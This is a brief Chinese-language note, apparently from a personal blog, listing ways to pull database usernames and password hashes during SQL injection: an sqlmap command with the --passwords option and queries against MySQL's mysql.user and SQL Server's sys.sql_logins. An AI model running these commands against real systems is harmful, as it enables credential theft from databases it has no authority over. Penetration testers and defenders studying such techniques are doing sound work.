前言
記錄幾個在sql注入中可以把database user, password拿出來的方法
SQLMap
1
| sqlmap.py -u xxx --passwords
|
SQL Query
1
2
3
4
5
| //MySQL
select host,user,password from mysql.user;
//SQL Server 2022
SELECT name, CONVERT(varchar(max), password_hash, 1) AS hashed_password FROM sys.sql_logins
|